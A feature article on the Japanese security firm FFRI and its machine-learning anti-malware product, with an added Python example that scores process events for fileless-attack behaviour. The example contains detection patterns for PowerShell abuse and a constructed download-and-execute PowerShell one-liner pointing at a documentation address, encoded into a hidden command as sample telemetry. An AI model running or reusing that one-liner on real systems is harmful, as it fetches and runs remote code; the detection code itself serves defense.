Machine learning fortifies legacy security methods in detecting advanced threats
Technology focuses on malware that has no signature, doesn’t match patterns
By Byron Acohido, ThirdCertainty
Over the past 10 years or so, machine learning has come to dominate our digital lives.
Commercial entities crunch mountains of data, leveraging “intelligent” mathematical algorithms at a furious pace. Much of this is done as part of the massively profitable endeavor of shaping consumer preferences and behaviors—to a degree unimagined by the best-and-brightest sci-fi authors of just 70 or 80 years ago.
So it’s about time the cybersecurity industry joined the party. Indeed, a thriving cottage industry has formed of information security companies that increasingly rely on machine learning, and feature it prominently, in their network defense systems.
A startup called FFRI Inc. and its intriguing founder and CEO, Yuji Ukai, are new entrants in this field. FFRI happens to be one of the standouts in Japan’s emerging cybersecurity industry. Ukai arrived at Black Hat in Las Vegas this summer hoping to make a splash with a new anti-malware product, developed in the land of the rising sun, which he refers to as the “Yarai.”
Yarai takes new security tack
Instead of amassing and continually expanding a blacklist of known malware and past-attack patterns, as legacy antivirus suites do, the Yarai uses machine learning to detect intrusions by malware for which there are no known signatures or patterns.
Stopping what is known as “fileless” malware, or “non-malware,” is a fast-emerging specialty. A fileless attack leaves no malicious file on disk for a signature scanner to match. Instead, it runs in memory and cleverly turns the legitimate, already-authorized applications on the company network (built-in scripting and administration tools, for example) against their owner, so the attacker never has to download a malicious file at all.
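The difference between a signature blacklist and heuristic detection of fileless activity, as described in the two paragraphs above, is easiest to see on concrete process-creation events. The following Python is an added illustration written for this article; it is not FFRI’s code and does not describe how the Yarai’s engines work. The sample events, the hashes, the indicator weights and the block threshold are all constructed assumptions chosen for the example.

```python
import base64
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass
class ProcessEvent:
    """One process-creation record, as an endpoint sensor would log it (constructed)."""
    image: str          # path of the newly created process
    parent_image: str   # path of the process that spawned it
    command_line: str
    sha256: str         # hash of the image file on disk


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


# Signature side: a blacklist of known-bad file hashes. Placeholder values, not real hashes.
KNOWN_BAD_SHA256 = {"4f2b" * 16: "Trojan.Dropper.Example"}


def signature_verdict(ev: ProcessEvent):
    """Classic antivirus logic: the file is bad only if its hash is on the list."""
    return KNOWN_BAD_SHA256.get(ev.sha256.lower())


# Heuristic side: behaviour that a fileless attack exhibits even though every binary is legitimate.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "cmd.exe"}
INDICATORS = [  # (regex over the command line, weight, explanation) - weights are assumptions
    (r"\b(?:iex|invoke-expression)\b", 3, "executes code straight from memory (IEX)"),
    (r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", 3, "fetches code over the network"),
    (r"frombase64string", 2, "decodes an embedded payload"),
    (r"-w(?:indowstyle)?\s+hidden", 2, "hidden window"),
    (r"-(?:ep|ex(?:ecutionpolicy)?)\s+bypass", 2, "bypasses execution policy"),
    (r"-nop(?:rofile)?\b", 1, "skips the profile"),
    (r"https?://", 1, "references a URL"),
]


def decode_encoded_command(cmd: str):
    """PowerShell's -EncodedCommand (any prefix from -e upward) carries base64 of UTF-16LE text."""
    m = re.search(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", cmd, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def heuristic_score(ev: ProcessEvent):
    """Hand-weighted linear score over behavioural features; a learned model would fit the weights."""
    score, reasons = 0, []
    child, parent = basename(ev.image), basename(ev.parent_image)
    if child in SCRIPT_HOSTS and parent in OFFICE_PARENTS:
        score += 4
        reasons.append(f"{parent} spawned {child}")
    text = ev.command_line
    decoded = decode_encoded_command(text)
    if decoded is not None:
        score += 2
        reasons.append("encoded command")
        text = f"{text}\n{decoded}"   # scan the decoded payload as well as the visible command line
    for pattern, weight, label in INDICATORS:
        if re.search(pattern, text, re.IGNORECASE):
            score += weight
            reasons.append(label)
    return score, reasons


def classify(ev: ProcessEvent, threshold: int = 5) -> dict:
    sig = signature_verdict(ev)
    score, reasons = heuristic_score(ev)
    verdict = "block (signature)" if sig else "block (heuristic)" if score >= threshold else "allow"
    return {"image": basename(ev.image), "signature": sig, "score": score,
            "reasons": reasons, "verdict": verdict}


# Constructed sample telemetry. 203.0.113.10 is a documentation address, not a real host.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage2.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
POWERSHELL_SHA = "a1c3" * 16   # stand-in for the hash of the legitimate, signed binary
SAMPLE_EVENTS = [
    # 1. A document macro launches hidden, encoded PowerShell; nothing malicious is written to disk.
    ProcessEvent(POWERSHELL, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 f"powershell.exe -NoP -W Hidden -Enc {ENCODED}", POWERSHELL_SHA),
    # 2. An administrator runs a backup script from a console: same binary, same hash, benign.
    ProcessEvent(POWERSHELL, r"C:\Windows\System32\cmd.exe",
                 r"powershell.exe -File C:\Scripts\nightly-backup.ps1", POWERSHELL_SHA),
    # 3. A classic file-based dropper whose hash is already blacklisted.
    ProcessEvent(r"C:\Users\alice\AppData\Local\Temp\invoice.exe", r"C:\Windows\explorer.exe",
                 "invoice.exe", "4f2b" * 16),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(classify(ev))
```

Events 1 and 2 run the identical, legitimately signed powershell.exe, so a hash blacklist can never tell them apart; only the context (an Office parent, a hidden window, an encoded command that decodes to a download-and-execute one-liner) separates them, which is the territory heuristic and machine-learning engines work in. The third event shows that signatures still do their job on malware that does touch disk, which is why the article’s subject is described as sitting on top of existing defenses rather than replacing them.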
“We are just focusing on the heuristic technology and also machine learning technology to detect unknown (malware),” Ukai says.
Ukai, a systems engineer who got his career start at Kodak’s R&D office in Japan, spent four years at eEye Digital Security in Orange County, California, during the go-go startup days of antivirus companies. He worked alongside Marc Maiffret, the researcher who uncovered the Code Red worm attack.
In 2007, Ukai returned to Japan to scratch his entrepreneurial itch. At the time, Japanese companies seeking cybersecurity solutions had no domestic suppliers to choose from, and Ukai saw an opportunity in his homeland. “It wasn’t a very good time,” he says. “But the reason why I just went back to Japan is that … in Japan, there was no such thing as a software security company.”
After 10 years in business, FFRI now boasts the Japanese government and other large Japanese enterprises as customers.
Japan fertile ground for startup
Creating a cybersecurity firm that stayed a few steps ahead was crucial given the lack of innovation in Japan and Japanese customers’ heavy reliance on imports. “If a new cyber threat were to have happened in Japan, we probably wouldn’t have any solution if we couldn’t import new technology from other countries. That’s why we started the software R&D company in Japan,” he says.
The name of the firm, FFRI, is an abbreviation for Fourteenforty Research Institute, a reference to a difficult jump in snowboarding called a “1440.” The jump includes four full 360-degree rotations.
Ukai himself is an avid snowboarder, having caught the bug as a young adult. He’s proficient enough, he told me, to have pulled off a few dicey aerials, though nothing close to a 1440.
FFRI’s main marketing pitch revolves around the idea that conventional security measures, such as antivirus software, security patching and site filtering, aren’t enough. Advanced malware attacks can penetrate these crucial but often outdated measures, says Pablo Garcia, head of FFRI’s U.S. unit.
Advanced solution to advanced malware
“Our sole focus is advanced malware attacks,” Garcia says. “(Given) the amount of advanced malware that’s hitting organizations today, there really need to be solutions out there that can fortify a network or protect a network in a way that doesn’t require a lot of resources or overhead,” he says.
Timing may be on their side. A series of ransomware attacks, including the WannaCry and Petya attacks, as well as the recent string of high-profile network breaches at Equifax, Deloitte and the U.S. Securities and Exchange Commission, is raising more awareness of cutting-edge attack tactics.
“I mean we’ve really been focusing on those areas for a while,” Garcia says. “The fileless malware has been around for a long time. They’re still occurring. It’s almost like the world is trying to eradicate measles and you still get cases of the measles even though, yes, there are good solutions out there for it.”
Ukai says his product can sit on top of other intrusion-prevention systems to help detect and deter advanced attacks. “It is the biggest difference between just regular classical antivirus software and our technology,” he says. “We have five kinds of different engines to detect malware.”
Japan’s notoriously demanding customers also help FFRI’s operations in the United States, Garcia says. “They focus on those things that, I think, could easily be overlooked,” he says. “We’re pursuing this market with the technology that we’re offering. It’s well ahead of what a lot of people are trying to do right now.”
For a deeper drill down on this discussion, please listen to the accompanying podcast.